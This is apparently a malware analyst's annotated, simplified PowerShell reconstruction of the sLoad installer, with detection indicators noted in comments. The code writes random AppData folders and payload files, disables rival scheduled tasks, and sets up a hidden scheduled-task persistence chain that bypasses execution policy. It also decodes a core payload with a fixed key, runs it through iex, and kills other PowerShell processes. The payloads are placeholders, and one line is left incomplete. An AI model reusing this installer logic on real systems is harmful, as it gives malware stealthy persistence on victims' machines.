# sLoad installer (analyst's deobfuscated, simplified reconstruction).
# sLoad installs itself in a random directory under APPDATA\Roaming.
# In that directory 4 files will be saved:
#  - main.sh  - The sload core as a MS secure string with key @(1..16)
#  - sleep.sh - The sload C2 list as a MS secure string with key @(1..16)
#  - .viki    - The VBS script run by the scheduled task. This will simply run .ps1
#  - .ps1     - A PS1 script that will decode and run the sload core
# NOTE(review): the two payload strings below are placeholders ('... long secure string ...'),
# not the real encoded core / C2 list; the listing is for understanding behaviour, not execution.
# Detection summary (all grounded in the commands below): random 8/9-letter names under
# %APPDATA%\Roaming, a scheduled task named S<n><folder> running "wscript /E:vbscript ...viki"
# every 4 minutes, a VBS launching "powershell -ep bypass", and WMI-based termination of
# other PowerShell processes.

# A random 8-letter name for the .viki / .ps1 companion files
$installFileName= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
# A random 9-letter name for the install folder
$installFolderName=-join ((65..90) + (97..122) | Get-Random -Count 9 | % {[char]$_});
# Install dir is built from a hard-coded profile path, not $env:APPDATA
$installDir = "c:\users\"+$env:username+"\AppData\Roaming\"+$installFolderName;
# Secure strings key: a fixed, trivially known 16-byte key (1..16).
# Anything encoded with it (main.sh / sleep.sh) can be decoded by an analyst with the same
# ConvertTo-SecureString call used in the companion .ps1 further down.
$key=@(1..16);
# Make install dir
If ( ! (test-path $installDir)) { New-Item -ItemType Directory -Force -Path $installDir }
# Change PWD to install dir
Set-Location -Path $installDir

# Get all scheduled tasks whose name starts with an S followed by a number and disable them.
# This removes other sload installations since S\d+ tasks are created by sLoad (see the
# /create command below). The CSV is re-labelled with arbitrary one-letter headers; column
# 's' is the second column of "schtasks /FO CSV /v", i.e. TaskName, which schtasks prints
# with a leading backslash (hence the '^\\S' anchor and the .substring(1) below).
$curScheduledTasks = schtasks /query /FO CSV /v | ConvertFrom-CSV -Header 'c','s','f','g','q','w','e','r','h'
$curScheduledTasks = $curScheduledTasks | Where { $_.s -match '^\\S\d+.*' };
if ($curScheduledTasks -and $curScheduledTasks.length) {
  # Several matches: $nTasks is later used to sequence the new task name
  $nTasks = $curScheduledTasks.length;
  for ($i=0; $i -le $curScheduledTasks.length-1; $i++) {
    # Disable the task (hidden window; .substring(1) strips the leading backslash)
    start-process -windowstyle 'hidden' 'schtasks /change /TN '+$curScheduledTasks[$i].s.substring(1)+' /disable'
  }
} elseif ($curScheduledTasks) {
  # Single match: the result is a scalar object here, not an array
  $nTasks=1;
  # Disable the task
  start-process -windowstyle 'hidden' 'schtasks /change /TN '+$curScheduledTasks.s.substring(1)+' /disable';
} else {
  $nTasks=0;
}

# Save the core into main.sh in the install dir (placeholder content in this listing)
$sloadCore+='... long secure string ...';
$sloadCore.trim() | out-file $installDir'\main.sh';
# Save the C2 list in sleep.sh in the install dir (placeholder content in this listing)
$sloadC2s+='... 
not so long secure string ...';
$sloadC2s.trim() | out-file $installDir'\sleep.sh';

# The kickstarter VBS script (deobfuscated) that is launched by the scheduled task and will
# run a companion PS1 file. Here-string is expanding (@"), so $installDir and
# $installFileName are substituted at write time. Note the child PowerShell is started with
# "-ep bypass" and a hidden window (0) — both are visible in process command lines.
$kickStarter = @"
Set shell = WScript.CreateObject ("WScript.Shell")
shell.CurrentDirectory="$installDir"
shell.run "powershell -ep bypass file $installFileName.ps1", 0, -1
"@
# Create the persistence task and write the kickstarter VBS.
# Task: name "S<nTasks><installFolderName>", runs every 4 minutes (/sc minute /mo 4),
# action "wscript /E:vbscript <installDir>\<installFileName>.viki". A task whose action is
# wscript with /E:vbscript pointing into AppData\Roaming is the main persistence indicator.
start schtasks -ArgumentList '/F /create /sc minute /mo 4 /TN "S' + $nTasks + $installFolderName + '" /ST 07:00 /TR "wscript /E:vbscript ' + $installDir + '\'+ $installFileName+'.viki"';
$kickStarter | out-file $installDir'\'$installFileName'.viki'

# Write the companion (to the VBS script) PS1 file that will run the sload code in main.sh.
# The original form of the code would use:
# $Ug=Get-Command -type Cmdlet | Where-Object {$_.name -notmatch 'stop' -and $_.name -notmatch 'invoke'} | Get-Random -Count 24 | select;
# to make random command names inside a try/catch and then put the real code in the catch clause.
# We simplified the whole script for clarity and thus also removed the generating code.
# NOTE(review): "$bWbnuf = ;" is syntactically incomplete and presumably a leftover of that
# removed random-name generation; it is kept as found. The here-string is expanding, so the
# $-variables inside it are substituted by the installer at write time rather than read by
# the .ps1 at run time. Runtime behaviour of the companion: skip if a second powershell.exe
# whose command line contains the file name already exists ($alreadyRunning[1]), decode
# main.sh with the fixed key, strip three literal junk tokens, and pass the result to iex.
$kickStarterPS1 = @"
$alreadyRunning = Get-WmiObject win32_process -Filter name="powershell.exe" | where {$_.CommandLine -match "$installFileName"};
if ($alreadyRunning[1] -eq $null) {
  $key = @(1..16);
  $bWbnuf = ;
  $sloadCore = gc "main.sh";
  $sloadCoreDecoded = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR(ConvertTo-SecureString $sloadCore -key $key));
  $sloadCoreDecoded -replace "wRaAWfUxZ|GTebwEjsc|MEIQLobzGC" | iex;
}
"@
$kickStarterPS1 | out-file $installDir'\'$installFileName'.ps1'

# Terminate all PowerShell processes started with an execution-policy bypass ("-ep "),
# i.e. copies of sload. The match is on the command line only, so any unrelated process
# launched with "-ep " is killed too; a burst of WMI Win32_Process.Terminate calls from
# PowerShell is itself a useful detection signal.
(Get-WmiObject win32_process | where-object {$_.CommandLine -match "-ep "}).terminate()